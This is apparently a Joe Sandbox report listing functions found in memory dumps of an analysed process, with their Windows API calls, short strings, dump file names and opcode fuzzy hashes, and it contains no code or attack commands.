Function 00E5870A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(P=,?,?,00E53D50,00000000,FFFFFFFF), ref: 00E58735

Strings

P=, xrefs: 00E5872C, 00E58734

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: Close
String ID: P=
API String ID: 3535843008-2286154353
Opcode ID: 7e1edc69cbfdc3621f6e5fffb0b044726546cd54554a5d3c7b1d93ab9e780291
Instruction ID: 853bddffaed48261b00662cd30354b69271f9bfbf84da9ec7a599ed73857dbfe
Opcode Fuzzy Hash: 7e1edc69cbfdc3621f6e5fffb0b044726546cd54554a5d3c7b1d93ab9e780291
Instruction Fuzzy Hash: ACE08C35600210ABDB20DBB48C86EEB7B69EF44290F154498BD59AB282D630A610C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E58710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(P=,?,?,00E53D50,00000000,FFFFFFFF), ref: 00E58735

Strings

P=, xrefs: 00E5872C, 00E58734

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: Close
String ID: P=
API String ID: 3535843008-2286154353
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: e9e1cb04fab2d5690c6607aa14a2fcc2f820f9a1c6132d662fcc8b996f736829
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 93D01275200214ABD710EBA8CC45ED77B9CEF44750F154455BA185B242C530F600C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00E587C0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00E42D11,00002000,00003000,00000004), ref: 00E587F9

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 615e736ce664c516b9be75d32f2209342f05e6f3b816c69f75f30b81d78e9472
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 94F015B2200218ABCB14DF99CC81EEB77ADAF88750F118548FE08A7241C630F910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E587BF Relevance: 1.5, APIs: 1, Instructions: 27memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00E42D11,00002000,00003000,00000004), ref: 00E587F9

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 96f3707414c3c889cc2304c91edc517fe7c644e01629b0a2da874c258f551642
Instruction ID: 344091c7a06dc8b509b3e39479eadd095898704745a9fcde08033105685efeff
Opcode Fuzzy Hash: 96f3707414c3c889cc2304c91edc517fe7c644e01629b0a2da874c258f551642
Instruction Fuzzy Hash: E9E039B520414AABCB14DFA8DC84CA777A9BF88250B158A49FD4CA7202C234E815CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA986A

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c7761c4460f3d56a41b3c2665c415c356792f29a133672077a48fbf49f84edd4
Instruction ID: 3c92afd831a4a6c798f35b80a03229c5b600dcc0be9fdbdde920541050535db4
Opcode Fuzzy Hash: c7761c4460f3d56a41b3c2665c415c356792f29a133672077a48fbf49f84edd4
Instruction Fuzzy Hash: 6590027130100413F15261595905B47000DD7D0285F91D462A0815558DD696E952B5A1

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA984A

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 371a8f6b3f76cf822a1f00725b0dbdaa69e41765f88d30e2a931e182565a6db1
Instruction ID: 674b80c815a76f56af785d1d7bd6f52dc51d6a62813ba21d79eb4f3fae40687e
Opcode Fuzzy Hash: 371a8f6b3f76cf822a1f00725b0dbdaa69e41765f88d30e2a931e182565a6db1
Instruction Fuzzy Hash: 33900261342041537586B1595805947400AE7E0285791D062A1805950CC566F856EAA1

Uniqueness

Uniqueness Score: -1.00%

Function 04EA95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA95DA

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f095136ea92621d481b9b77441274242f3458df37fd5601c0f7facea1e3c4f91
Instruction ID: af197e2f37effb97c852cc924392f4c8a13f7476972709dbcdd1a99d08425ae8
Opcode Fuzzy Hash: f095136ea92621d481b9b77441274242f3458df37fd5601c0f7facea1e3c4f91
Instruction Fuzzy Hash: 489002A130200003614671595815A57400ED7E0245B51D071E1405590DC565E89175A5

Uniqueness

Uniqueness Score: -1.00%

Function 04EA99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA99AA

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6be2690097e283479646a2f975b6de472357b141121d23889c4d0ab5b9f10f30
Instruction ID: fb1bf594cbd4bb2073bfa3f713047e636e92bb65051b5a1731c07d73ccc50647
Opcode Fuzzy Hash: 6be2690097e283479646a2f975b6de472357b141121d23889c4d0ab5b9f10f30
Instruction Fuzzy Hash: E99002A134100443F14161595815F470009D7E1345F51D065E1455554DC659EC5275A6

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA954A

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 15c467b0f9f00e5d65fcf805afb9ee6c9f8337e062a30910ccb66920a6f8f310
Instruction ID: 5f1c0e13e03bd8531dd882fbac0137076744657a3e89a0d87d512d09ed2149fc
Opcode Fuzzy Hash: 15c467b0f9f00e5d65fcf805afb9ee6c9f8337e062a30910ccb66920a6f8f310
Instruction Fuzzy Hash: 36900265311000032146A5591B05947004AD7D5395351D071F1406550CD661E86165A1

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA991A

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c4bba78b433ece7a91aa6aa4faa7ff5507113b64306825802a4600262980840f
Instruction ID: 3897819121b135edcbce7172f2a2fcf402dfecb278e9fe15ea3d5c70ed8aacfa
Opcode Fuzzy Hash: c4bba78b433ece7a91aa6aa4faa7ff5507113b64306825802a4600262980840f
Instruction Fuzzy Hash: BC9002B130100403F18171595805B870009D7D0345F51D061A5455554EC699EDD57AE5

Uniqueness

Uniqueness Score: -1.00%

Function 04EA96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA96EA

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 570178e710e84e0a03f142e6755b5fd2f18315f80e2bb30a537983e7ec77169e
Instruction ID: d3d07af7678c15f73285423af9d132760db1da9be2c3fbfd697699ff87b71821
Opcode Fuzzy Hash: 570178e710e84e0a03f142e6755b5fd2f18315f80e2bb30a537983e7ec77169e
Instruction Fuzzy Hash: EA90027130108803F15161599805B8B0009D7D0345F55D461A4815658DC6D5E89175A1

Uniqueness

Uniqueness Score: -1.00%

Function 04EA96D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA96DA

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be8750a286054b39273620ec33f4c923e06db22543da414201ff0d0a98e08661
Instruction ID: 5561ac17529b5bc032d08857acaa8bc10ee2099d83d8a0eba606eeeb4cd2ae4b
Opcode Fuzzy Hash: be8750a286054b39273620ec33f4c923e06db22543da414201ff0d0a98e08661
Instruction Fuzzy Hash: 8990027130100843F14161595805F870009D7E0345F51D066A0515654DC655E85179A1

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA966A

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41b2e83fd2086d87577019131504f367c9800fc141e06379b919f1dd59db6597
Instruction ID: 28bf1098854caf8ad509e829ad26e05695921c597338575882de2b8023874341
Opcode Fuzzy Hash: 41b2e83fd2086d87577019131504f367c9800fc141e06379b919f1dd59db6597
Instruction Fuzzy Hash: 1B90027130100803F1C171595805A8B0009D7D1345F91D065A0416654DCA55EA597BE1

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA965A

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 269d0f4dbbb27887082dea4507e6a20315b08b826eda3f3acf143d46c51658f3
Instruction ID: 20e15a2510e9de398fedaa3f801c11e604d0ee02ea16af01b5e1032c288e30b5
Opcode Fuzzy Hash: 269d0f4dbbb27887082dea4507e6a20315b08b826eda3f3acf143d46c51658f3
Instruction Fuzzy Hash: E890027130504843F18171595805E870019D7D0349F51D061A0455694DD665ED55BAE1

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA9A5A

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce3cce3e3d024de3bc55b87299249b59a19360da4d303b68ef753dd2fa0b1850
Instruction ID: ad0bc3a1e72022df30879f5fec9f1f8ff89d30a5aad3f2477a18dcb1664d4f0e
Opcode Fuzzy Hash: ce3cce3e3d024de3bc55b87299249b59a19360da4d303b68ef753dd2fa0b1850
Instruction Fuzzy Hash: B590026131180043F24165695C15F470009D7D0347F51D165A0545554CC955E86169A1

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA961A

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 385c180d91a8d0968a8613555611f9c6351171a35dd9fba4ef83af24825e23cd
Instruction ID: 98a0a85830973ea32506daccab8ffe6e740e75e411244edbbc92faa1e1d28e8c
Opcode Fuzzy Hash: 385c180d91a8d0968a8613555611f9c6351171a35dd9fba4ef83af24825e23cd
Instruction Fuzzy Hash: 1890027170500803F19171595815B870009D7D0345F51D061A0415654DC795EA557AE1

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA9FEA

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb60dd4f917141488b73531c72f8fcb394bb8fc2b08b198a324d590d47b58582
Instruction ID: 891bd8a531a19835441d91412560d77e47f918e750984f6b1ad83ae3668e8f7e
Opcode Fuzzy Hash: bb60dd4f917141488b73531c72f8fcb394bb8fc2b08b198a324d590d47b58582
Instruction Fuzzy Hash: 1290027131114403F15161599805B470009D7D1245F51D461A0C15558DC6D5E89175A2

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA978A

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b7031515bac583ccbe75cbeebeb4214776d5620e77904beca4b429889218bc6
Instruction ID: 61ee86e2b44f0b22abfc9369be5a30af80ad368b7870e4559a279f9fa022da13
Opcode Fuzzy Hash: 4b7031515bac583ccbe75cbeebeb4214776d5620e77904beca4b429889218bc6
Instruction Fuzzy Hash: F190026931300003F1C171596809A4B0009D7D1246F91E465A0406558CC955E86967A1

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA9B0A

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7fbd51331b850cfcdee5917a2f22d1157101446106320446bd62a2949f3c97fa
Instruction ID: d1d1d862cbdbe122923cf8c1b2727a2720e0b06767d8fa0306c9950804bd20b2
Opcode Fuzzy Hash: 7fbd51331b850cfcdee5917a2f22d1157101446106320446bd62a2949f3c97fa
Instruction Fuzzy Hash: BD90026134100803F18171599815B47000AD7D0645F51D061A0415554DC656E9657AF1

Uniqueness

Uniqueness Score: -1.00%

Function 04EA9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EA971A

Memory Dump Source

Source File: 0000000B.00000002.821468138.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: true

Associated: 0000000B.00000002.821601469.0000000004F5B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.821610300.0000000004F5F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e40000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a21e33b7ea45a9995e8b67900e2e61d38dcc109f1c4c5597099ab25dc6a8192e
Instruction ID: 3186aff56fd23a7a91fd9b0df7e2dff5e7dc3d3c24e09c83b3a9e1439cf2e15e
Opcode Fuzzy Hash: a21e33b7ea45a9995e8b67900e2e61d38dcc109f1c4c5597099ab25dc6a8192e
Instruction Fuzzy Hash: 8190027130100403F14165996809A870009D7E0345F51E061A5415555EC6A5E89175B1

Uniqueness

Uniqueness Score: -1.00%

Function 00E57300 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00E573A8

Strings

wininet.dll, xrefs: 00E5735E, 00E57367
net.dll, xrefs: 00E57371, 00E573F7, 00E573CF, 00E573DB, 00E57403

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 09b6c9e9a7222ac9dfa50fda99bc66ac5838c667275f04f4cd5b0c0a53578890
Instruction ID: 99bbf8482da95a243cfd5c67ad30034db7c55bcdc6d657e33d8dade9247789f0
Opcode Fuzzy Hash: 09b6c9e9a7222ac9dfa50fda99bc66ac5838c667275f04f4cd5b0c0a53578890
Instruction Fuzzy Hash: 453192B6605700ABC715DF64D8A1FABB7F8AF48700F04851DFA596B241D730A559CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E572FF Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00E573A8

Strings

wininet.dll, xrefs: 00E5735E, 00E57367
net.dll, xrefs: 00E57371, 00E573CF, 00E573DB

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 13de510c89e4ae188dbb22a050294043fa3b0c112a2186db5165b8f463dc7de4
Instruction ID: ce0141370d33c9a862eede74463fe126e802491768fc8d3b2577b31f6590e3cd
Opcode Fuzzy Hash: 13de510c89e4ae188dbb22a050294043fa3b0c112a2186db5165b8f463dc7de4
Instruction Fuzzy Hash: B421B4B1605700ABC710EF64D8A1FABB7F8BF48700F04852DFA596B242D770A459CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00E572F6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00E573A8

Strings

wininet.dll, xrefs: 00E5735E, 00E57367
net.dll, xrefs: 00E57371, 00E573CF, 00E573DB

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 67aacf3e8dc50b1904b8e181b4a3f1c46bb5bd572d99bc418bd764f816b4994d
Instruction ID: 5587f165cf06c36ecd866291cc2a0bc5ebf382e6d83ddbede409d73e8163a8b2
Opcode Fuzzy Hash: 67aacf3e8dc50b1904b8e181b4a3f1c46bb5bd572d99bc418bd764f816b4994d
Instruction Fuzzy Hash: B921F671605601ABC711EF64D8A1B6BB7E4FF84301F04992DFD596B242D730E459CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00E588F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E43B93), ref: 00E5891D

Strings

.z`, xrefs: 00E5890C, 00E58918

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 731de4526ed0ffac483430135c08b26ab811108f3bbf5a80d2a81e44bb412d50
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 49E04FB1200214ABD714DF69CC49EE777ACEF88750F014554FD0857242C630F914CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00E588B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(65,?,00E53CAF,00E53CAF,?,00E53536,?,?,?,?,?,00000000,00000000,?), ref: 00E588DD

Strings

65, xrefs: 00E588D2, 00E588DC

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65
API String ID: 1279760036-1535465587
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: e3af7b9c75399bcf453e458ed53c549425e964790dfe9fa453c812e841d3ae2e
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: F0E012B1200218ABDB14EFA9CC45EA777ACAF88650F118558FE086B242C630F914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00E47303 Relevance: 3.2, APIs: 2, Instructions: 188threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E472DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E472FB

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 136ae263e1a6f47e38370d8b8757f98a5f7f6f22dad7e09517efc721be2e56c8
Instruction ID: 002b724608c2e44b092f6b5a73888af9352744217d5ee6414352a9582b12f3c0
Opcode Fuzzy Hash: 136ae263e1a6f47e38370d8b8757f98a5f7f6f22dad7e09517efc721be2e56c8
Instruction Fuzzy Hash: 4B6105B0904305AFD725DF64DC85FEBB7E8EB49304F10056DF989A7281DB70AA05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E51760 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,00E43AC6,00000000), ref: 00E51777

Strings

@J7<, xrefs: 00E5178B

Memory Dump Source

Source File: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e40000_control.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 21b4cb6494d58fb2d9f89c17ae3ee88c2eb30e53bc4433914fff54258ca215c3
Instruction ID: d75819e62bf5fe77163a254ec063f5ce6a6113833a155f5f588475ab5953240b
